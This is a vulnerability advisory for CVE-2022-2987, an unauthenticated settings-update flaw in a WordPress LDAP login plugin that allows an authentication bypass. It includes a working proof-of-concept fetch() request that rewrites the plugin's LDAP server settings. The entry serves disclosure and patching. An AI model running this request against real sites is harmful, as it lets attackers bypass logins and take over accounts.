WordPress Plugin Vulnerabilities

Ldap WP Login / Active Directory Integration < 3.0.2 - Unauthenticated Settings Update to Auth Bypass

Description

The plugin does not have any authorisation and CSRF checks when updating it's settings (which are hooked to the init action), allowing unauthenticated attackers to update them. Attackers could set their own LDAP server to be used to authenticated users, therefore bypassing the current authentication

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ldapConfig&ldapConfig_nonce=-&ldapURI=127.0.0.1&ldapEncrpytMethod=ldap&ldapport=389&ldapDN=user%40localhost&ldappassword=password',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Plugin icon
ldap-wp-login-integration-with-active-directory
Fixed in 3.0.2

References

CVE
CVE-2022-2987

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
9.1 (critical)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
0d9638b9-bf8a-474f-992d-2618884d3f67

Timeline

Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2022-09-05 (about 1 years ago)

Other

Published
Title
Published
2023-11-28
Title
Abandoned Cart Lite for WooCommerce < 5.16.2 - Missing Authorization via multiple AJAX functions
Published
2024-03-11
Title
Mollie Forms < 2.6.4 - Missing Authorization to Arbitrary Post Duplication
Published
2022-08-25
Title
Event Calendar < 1.4.7 - Unauthenticated Arbitrary Event Deletion
Published
2023-12-27
Title
Slider by Soliloquy < 2.7.3 - Subscriber+ Slider Data Access
Published
2022-12-23
Title
Waiting: One-click countdowns <= 0.6.2 - Missing Authorization